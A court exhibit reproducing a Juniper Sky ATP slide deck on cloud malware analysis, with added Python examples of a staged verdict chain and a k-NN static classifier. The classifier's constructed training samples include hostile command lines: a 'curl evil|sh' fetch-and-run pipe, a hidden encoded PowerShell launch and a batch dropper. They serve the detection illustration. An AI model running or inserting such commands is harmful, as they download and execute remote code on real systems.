Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 1 of 23

EXHIBIT 5


Sky ATP: Advanced Threat Protection
Juniper's Sky IS the limit!

Santanu Ganguly <santanu@juniper.net>
Juniper Networks, April 2016


An Evolving Threat Landscape

New actors, new threats, and new technologies mean the threat landscape is constantly evolving.

* State-sponsored actors and targeted attacks change the landscape
* Attackers are constantly looking for, and finding, new vectors
* Security solutions need to be agile to keep up
* The impact of security breaches can't be overstated

The Head of Cyber of British Intelligence, in his first public, yet anonymous, interview stated: "There are now three certainties in life: there's death, there's taxes and there's a foreign intelligence service on your system."

Copyright © 2016 Juniper Networks, Inc


Impact of security breaches: Target breach (2013)

Target stolen data: 110M records

Ponemon Institute: average breach costs $214 per record stolen

(Figure: breach-impact graphic; legible label fragment: "... progress, lost customers")

Cost of the breach:
* Gross expense of $191M
* Net cost of $162M


Current solutions fail to protect organizations from sophisticated, evasive threats.

Sky Advanced Threat Prevention to the rescue

(Figure: threat spectrum from "Simple Threats" to "Sophisticated Threats")


What is Sky Advanced Threat Prevention

(Figure: screenshot of the Sky ATP web portal at https://amer.skyjunipersecurity.net; legible panel labels: C&C Server, Scanned, Threat Count)


Why Cloud?

* Cloud environments are flexible and massively scalable
* A shared platform means everyone benefits from new threat intelligence in near real-time
* Security developers can update their defenses as new attack techniques come to light, with no delay to distribute the threat intel
* On-site platforms offer lower efficiency, scalability, efficacy and agility

The connection between the SRX and the Cloud is encrypted. Customer data exported to the Cloud is destroyed after analysis. Customer data is isolated to ensure privacy.


Sky Advanced Threat Prevention Architecture:
Sky components are divided between the SRX, embedded in Junos, and the cloud

* Components in Junos:
  - SecIntel Service
    * Receives feeds from the cloud: GeoIP, Command and Control, Infected Hosts
  - Sky ATP Service
    * Passes incoming files to the Cloud for analysis
    * Enforces policies based on Cloud verdicts


Sky Advanced Threat Prevention Architecture (cont.)

* Components in the Cloud:
  - Analytics
    * Malware analysis pipeline
    * C&C / malware event correlation
  - Threat feeds
    * Cascade: generating the C&C feed
    * GeoIP: externally sourced
    * Infected Hosts: generated by event correlation
  - Management
    * Web UI for all your management love and affection


Sky Advanced Threat Prevention: Infected Hosts

The Infected Hosts feed allows automated quarantining and active responses to internal threats. This is an "event-driven" feed, created in the Cloud based on what's actively happening on a protected network.


Sky Advanced Threat Prevention Use Cases

Use cases across the deployment spectrum of SRX:

A. Campus Edge Firewall
   * Protection of end user devices from files downloaded from the Internet

B. Branch Router
   * Protection for split-tunnel deployments

C. Data Center Edge
   * Application protection from infected files

(Figure: deployment diagram showing Data Center and Campus Locations)


Sky Advanced Threat Prevention in action

(Figure: Sky ATP Secure Cloud Service / Spotlight Secure Cloud Service architecture; labelled blocks: Malware Inspection Pipeline, Feed Analysis & Efficacy, Dynamic Analysis, Internal Compromise Detection, Identified C&C, Malware, Web-based Service Portal)


The ATP verdict chain
Staged analysis: combining rapid response and deep analysis

Suspect files enter the analysis chain in the cloud.

Cache lookup (~1 second):
Files we've seen before are identified and a verdict immediately goes back to the SRX.

Anti-virus scanning (~5 seconds):
Multiple AV engines return a verdict, which is then cached for future reference.

Static analysis (~30 seconds):
The static analysis engine does a deeper inspection, with the verdict again cached for future reference.

Dynamic analysis (~7 minutes):
Dynamic analysis in a custom sandbox leverages deception and provocation techniques to identify evasive malware.


Anti-Virus: First Pass

* Overcoming false positives (FP) and false negatives (FN)
* Use multiple AV engines
* Combine with machine learning

(Figure: several anti-virus clients feeding one combined Verdict)
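The staged chain from the verdict-chain slide, together with the multi-engine first pass above, as an added worked example (Python written for this page, not Juniper's code). The engine signature sets, the two-engine quorum, the static rules, the sandbox observation log and the sample files are all constructed for illustration; the per-stage latencies are the deck's approximate figures, used only to total up the cost of each path. The EICAR string is the industry's standard harmless anti-virus test pattern.

```python
"""Staged verdict chain (added example, not Juniper's code): hash cache,
multi-engine anti-virus, rule-based static analysis, then a sandbox. Each
stage either returns a verdict or escalates; every verdict is cached under
the file's SHA-256 so a resubmission is answered at the cache step."""
import hashlib
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

MALICIOUS, BENIGN, UNKNOWN = "malicious", "benign", "unknown"

# --- anti-virus first pass -------------------------------------------------
# Constructed signature sets standing in for three independent engines. EICAR
# is the industry's harmless anti-virus test pattern, not real malware.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
ENGINES: Dict[str, List[bytes]] = {
    "engine_a": [EICAR],
    "engine_b": [EICAR, b"powershell -enc"],
    "engine_c": [b"cmd.exe /c"],
}
AV_QUORUM = 2  # assumption: a single engine's hit is treated as a possible false positive

def av_ensemble(data: bytes) -> str:
    hits = [n for n, sigs in ENGINES.items() if any(s in data for s in sigs)]
    # The union of engines narrows false negatives, the quorum narrows false
    # positives. "Nobody flagged it" is not a clean bill: escalate instead.
    return MALICIOUS if len(hits) >= AV_QUORUM else UNKNOWN

# --- static analysis, rules only --------------------------------------------
TOKENS = [b"cmd.exe", b"WScript.Shell", b"powershell"]

def static_rules(data: bytes) -> str:
    score = 2 if data[:2] == b"MZ" and b"UPX" in data else 0   # PE with packer section names
    score += sum(tok in data for tok in TOKENS)
    if score >= 2:
        return MALICIOUS
    return BENIGN if score == 0 else UNKNOWN   # one weak indicator: detonate it

# --- dynamic analysis, sandbox ---------------------------------------------
DROPPER = b"@echo off\r\ncmd.exe /c whoami > %TEMP%\\w.txt\r\n"
# Constructed observation log keyed by file hash. The real service records
# these by hooking the OS inside a live desktop (about 7 minutes per run).
SANDBOX_LOG: Dict[str, List[str]] = {
    hashlib.sha256(DROPPER).hexdigest(): ["spawn:cmd.exe", "write:%TEMP%\\w.txt"],
}

def sandbox(data: bytes) -> str:
    seen = SANDBOX_LOG.get(hashlib.sha256(data).hexdigest(), [])
    return MALICIOUS if any(b.startswith("spawn:") for b in seen) else BENIGN

@dataclass
class Stage:
    name: str
    latency_s: float            # the deck's approximate per-stage timing
    run: Callable[[bytes], str]

class VerdictChain:
    def __init__(self, stages: List[Stage]):
        self.stages = stages
        self.cache: Dict[str, Tuple[str, str]] = {}   # sha256 -> (verdict, stage)

    def verdict(self, data: bytes) -> Tuple[str, str, float]:
        """Return (verdict, deciding stage, cumulative seconds spent)."""
        digest = hashlib.sha256(data).hexdigest()
        elapsed = 1.0                                  # cache lookup, ~1 s
        if digest in self.cache:
            v, stage = self.cache[digest]
            return v, "cache(" + stage + ")", elapsed
        for stage in self.stages:
            elapsed += stage.latency_s
            v = stage.run(data)
            if v != UNKNOWN:
                self.cache[digest] = (v, stage.name)
                return v, stage.name, elapsed
        return UNKNOWN, "exhausted", elapsed           # left to the SRX policy

CHAIN = VerdictChain([
    Stage("antivirus", 5.0, av_ensemble),
    Stage("static", 30.0, static_rules),
    Stage("dynamic", 420.0, sandbox),
])

if __name__ == "__main__":
    samples = {   # constructed inputs
        "eicar.com": EICAR,
        "notes.txt": b"Quarterly numbers attached, see you Monday.\n",
        "packed.exe": b"MZ" + b"\x00" * 60 + b"UPX0\x00UPX1\x00powershell -enc AAAA",
        "run.bat": DROPPER,
    }
    for name, blob in samples.items():
        print(name, CHAIN.verdict(blob))
    print("run.bat again", CHAIN.verdict(DROPPER))    # served from the cache
```

Running it shows the four paths: the EICAR file stops at the anti-virus stage because two engines agree, the text note is cleared by the static rules, the packed executable is caught by the static rules after a single engine hit fell short of the quorum, and the batch file, which trips only one engine and one static indicator, goes all the way to the sandbox; resubmitting it is answered from the cache at the cost of a lookup. The chain treats a clean anti-virus result as "not yet known" rather than "benign", which is what makes the later stages reachable at all.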


Static Analysis: Pulling apart the code

* Break the file down into features:
  - File structure
  - Meta info (file name, vendor, etc.)
  - Categories of instructions used
  - File entropy
  - Etc.
* Feed the features into a machine learning algorithm:
  - First teach it what malware looks like
  - Then ask if something is malware

Static analysis is traditionally done with rules. Argon extends this by adding machine learning to improve verdict accuracy.

(Figure: extracted features flowing through the machine learning model to a Verdict)
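The feature extraction and "teach, then ask" steps above, as an added worked example (Python written for this page; Argon's real model and feature set are not described on the slide and this code does not claim to reproduce them). The five features, the suspicious-token list, the training corpus and the two unseen inputs are constructed; the learner is a distance-weighted k-nearest-neighbour vote, chosen because it makes "how closely a new file resembles known good and bad samples" explicit.

```python
"""Static features fed to a learned model (added example, not Juniper code).
'Teach it what malware looks like' = store labelled feature vectors;
'ask if something is malware' = compare the new file's features with its
closest labelled neighbours (distance-weighted k-NN)."""
import math
from typing import List, Tuple

# Constructed list of API/command strings whose presence is counted as one
# "category of instructions" feature. A real extractor would disassemble.
SUSPICIOUS_TOKENS = [b"cmd.exe", b"powershell", b"WScript.Shell",
                     b"VirtualAlloc", b"CreateRemoteThread"]

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~4-5 for text, ~8 for packed or encrypted payloads."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def extract_features(data: bytes) -> List[float]:
    """Break the file into the kinds of features the slide lists, scaled to ~[0, 1]."""
    n = max(len(data), 1)
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / n
    tokens = sum(tok in data for tok in SUSPICIOUS_TOKENS)
    return [
        1.0 if data[:2] == b"MZ" else 0.0,      # file structure: PE/DOS header
        shannon_entropy(data) / 8.0,             # file entropy
        printable,                               # text vs binary content
        min(tokens, 5) / 5.0,                    # categories of instructions/APIs
        math.log2(n) / 24.0,                     # size (meta info)
    ]

class KnnVerdict:
    def __init__(self, k: int = 3):
        self.k = k
        self.memory: List[Tuple[List[float], str]] = []

    def teach(self, data: bytes, label: str) -> None:
        self.memory.append((extract_features(data), label))

    def ask(self, data: bytes) -> Tuple[str, float]:
        """Return (label, share of the distance-weighted vote won by that label)."""
        f = extract_features(data)
        nearest = sorted(self.memory, key=lambda m: math.dist(f, m[0]))[: self.k]
        votes = {}
        for vec, label in nearest:
            votes[label] = votes.get(label, 0.0) + 1.0 / (math.dist(f, vec) + 1e-9)
        label = max(votes, key=votes.get)
        return label, votes[label] / sum(votes.values())

def _pseudo_random(n: int, mult: int) -> bytes:
    """Deterministic high-entropy filler (every byte value equally often)."""
    return bytes((i * mult + 7) % 256 for i in range(n))

# Constructed training corpus: the model learns from these, not from real malware.
TRAINING = [
    (b"MZ" + _pseudo_random(2048, 131) + b"VirtualAlloc\x00CreateRemoteThread", "malware"),
    (b"powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA; cmd.exe /c start", "malware"),
    (b"var sh=new ActiveXObject('WScript.Shell');sh.Run('cmd.exe /c curl evil|sh');", "malware"),
    (b"MZ" + b"\x90" * 64 + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 1500
     + b".text\x00.data\x00.rsrc\x00Hello, world!\x00", "benign"),
    (b"README\n\nThis tool converts CSV exports to JSON. Run convert.py --in data.csv.\n" * 6, "benign"),
    (b"id,name,amount\n1,alice,10.50\n2,bob,7.25\n3,carol,13.00\n" * 8, "benign"),
]

MODEL = KnnVerdict(k=3)
for sample, label in TRAINING:
    MODEL.teach(sample, label)

# Unseen inputs (constructed): a packed PE and a plain text note.
PACKED_PE = b"MZ" + b"UPX0" + _pseudo_random(4096, 197) + b"VirtualAlloc"
NOTE = b"Meeting notes: ship v2 on Monday, update the changelog, book the room.\n" * 4

if __name__ == "__main__":
    for name, blob in (("packed.exe", PACKED_PE), ("notes.txt", NOTE)):
        print(name, extract_features(blob), MODEL.ask(blob))
```

Entropy alone separates the packed executable from the note, but the note shares its entropy range with the two script samples, so for text inputs the token-count feature carries the decision. Distance weighting matters too: with a plain majority of three, a packed PE whose two nearest labelled samples are split between the classes would be decided by whichever third sample happens to be marginally closer.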


Dynamic Analysis: Sandboxing
Inside a custom sandbox environment

* Spool up a live desktop
* Hook into the OS to record everything
* Upload and execute the suspect file
* Apply Sky's deception and provocation techniques
* The full run takes approximately 7 minutes
* Download the activity recording for analysis
* Tear down the live desktop
* Generate a verdict with machine learning

At release: Windows 7
Future: Windows 8, 10, Android, Linux, other.

(Figure: VMware-hosted Windows 7 / Windows 8 sandbox images)


Sandboxing: Behavioral Analysis

Behavior analysis gives us a better understanding of what a suspect file is trying to do. Some behaviors are usually considered benign, while others may be benign but are also seen in malicious programs. Still others are usually associated with attack behaviors. Some examples:

(Figure: example behaviors; the list is illegible in the scan)


Machine Learning
Digging through massive piles of data: letting machines do what machines do best

* Compare a new sample to see how closely it resembles known good and bad samples

(Figure: known-sample comparison; the remaining slide text is illegible in the scan)


How is Sky ATP Different?

* High efficacy, scalable and tightly integrated solution
  - Distributed sensing and enforcement on SRX (no additional sensors)
* Actionable intelligence
  - In-line blocking to prevent zero-day infections from getting in
* Unique deception & provocation techniques to counter evasive threats
* Advanced machine learning
* Support for different types of analysis targets
  - Multi-platform executable and application support
  - Exploits and malicious content embedded in documents (MS Office, PDF)
  - Dangerous web applications (Java, Flash): future
* Cost-effective, non-intrusive solution with full network coverage


Summary
Leveraging the Cloud to provide efficacy and agility

Juniper Networks
Thank You!